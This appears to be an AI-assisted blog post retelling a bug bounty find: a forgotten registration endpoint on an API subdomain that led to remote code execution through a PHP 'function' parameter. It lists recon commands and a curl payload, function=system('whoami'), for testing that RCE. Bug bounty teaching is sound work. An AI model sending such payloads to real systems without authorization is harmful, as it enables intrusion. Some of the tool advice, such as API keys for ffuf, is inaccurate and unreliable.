During the recon phase of a private bug bounty program, I discovered a domain hosting an internal application with no registration allowed. After examining the JS files on the login page and finding no endpoints, I shifted focus to the subdomains identified by my recon tool. One subdomain, likely the API for the application, caught my attention. For instance, if the application subdomain was app1.domain[.]com, the API subdomain was app1api.domain[.]com.
Through fuzzing, I stumbled upon an endpoint like /company/registertest, which appeared to be a forgotten development endpoint allowing account creation. Despite the broad scope of the bug bounty program (*.domain[.]com), I registered an account and explored further, eventually uncovering a Remote Code Execution (RCE) vulnerability. The RCE was straightforward, involving an AJAX call in a JS file to a PHP file with a parameter named “function.”
This discovery underscores the importance of thinking about impact before reporting findings. If the application or subdomain is in scope, consider how to demonstrate a more significant impact rather than rushing to report initial findings.
Practice-Verified Commands and Tools:
1. Recon Tools:
- Use `amass` for subdomain enumeration:
amass enum -d domain.com
- Use `ffuf` for fuzzing endpoints:
ffuf -w /path/to/wordlist.txt -u https://app1api.domain.com/FUZZ
2. RCE Exploitation:
- If you identify an RCE vulnerability, test it with a simple payload:
curl -X POST -d "function=system('whoami');" https://app1api.domain.com/vulnerable_endpoint.php
3. API Testing:
- Use `Postman` or `curl` to test API endpoints:
curl -X POST -d '{"username":"test","password":"test"}' https://app1api.domain.com/company/registertest
4. Wordlist Customization:
- Tailor wordlists using
cewl:cewl -w custom_wordlist.txt https://app1.domain.com
What Undercode Say:
In the realm of cybersecurity, reconnaissance and persistence often lead to significant discoveries. Martín Martín’s experience highlights the importance of thorough recon and thinking beyond the obvious. Tools like amass, ffuf, and `cewl` are indispensable for bug bounty hunters. When testing for vulnerabilities, always consider the broader impact, as Martín did by exploring the forgotten endpoint.
For those diving into bug bounty programs, mastering Linux commands like curl, grep, and `awk` can streamline your workflow. For example, use `grep` to filter through large datasets:
grep "interesting_pattern" large_file.txt
On Windows, PowerShell commands like `Invoke-WebRequest` can be equally powerful:
Invoke-WebRequest -Uri https://app1api.domain.com/company/registertest -Method POST -Body '{"username":"test","password":"test"}'
Always remember to configure your tools properly, as Martín emphasized. For instance, ensure API keys are set up in tools like `amass` or `ffuf` to maximize their potential. Additionally, customizing wordlists based on your target can yield better results than relying on generic lists.
Finally, sharing experiences and learning from others, as Martín did, is invaluable. Whether through platforms like LinkedIn or community forums, collaboration and knowledge exchange are key to growth in cybersecurity. Keep exploring, keep learning, and always think about the bigger picture.
For further reading on recon techniques and bug bounty tips, check out Martín’s LinkedIn posts:
– Bug Bounty Tips
– Advanced Recon Strategies
References:
Hackers Feeds, Undercode AI
